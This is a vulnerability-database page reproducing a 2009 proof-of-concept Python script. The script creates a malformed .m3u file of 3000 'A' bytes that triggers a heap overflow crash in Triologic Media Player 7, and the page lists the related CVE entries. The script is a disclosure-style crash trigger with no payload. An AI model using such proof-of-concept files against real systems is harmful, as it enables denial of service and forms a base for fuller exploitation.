Lucene search
+L

Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow (PoC)

🗓️ 12 Jan 2009 00:00:00Reported by zAxType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Triologic Media Player 7 '.m3u' Local Heap Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2009-0262
23 Jan 200919:00
attackerkb
circl
Circl
CVE-2009-0262
12 Jan 200900:00
circl
circl
Circl
CVE-2009-0266
12 Jan 200900:00
circl
cve
CVE
CVE-2009-0262
23 Jan 200918:38
cve
cve
CVE
CVE-2009-0266
26 Jan 200915:05
cve
cvelist
Cvelist
CVE-2009-0262
23 Jan 200918:38
cvelist
cvelist
Cvelist
CVE-2009-0266
26 Jan 200915:05
cvelist
euvd
EUVD
EUVD-2009-0267
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2009-0271
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-0262
23 Jan 200919:00
nvd
Rows per page
# IN THE NAME OF ALLAH :)
#!/usr/bin/python
# Discovered By : zAx
# Download Application : http://www.download.com/Triologic-Media-Player/3000-2139_4-10601848.html?tag=mncol

print "**************************************************************************"
print " Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC\n"
print " Discovered By : zAx\n"
print " [email protected]\n"
print " In that PoC thanks for : Stack ;) My BrOthEr :)"
print "**************************************************************************"

overflow = "\x41" * 3000 # not right, just a PoC

try:
    out_file = open("zAx.m3u",'w')
    out_file.write(overflow)
    out_file.close()
    raw_input("\nPoC file created!, Now go to the program and click at Load Button\n")
except:
    print "Error"
# EoF

# milw0rm.com [2009-01-12]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jan 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.06194
33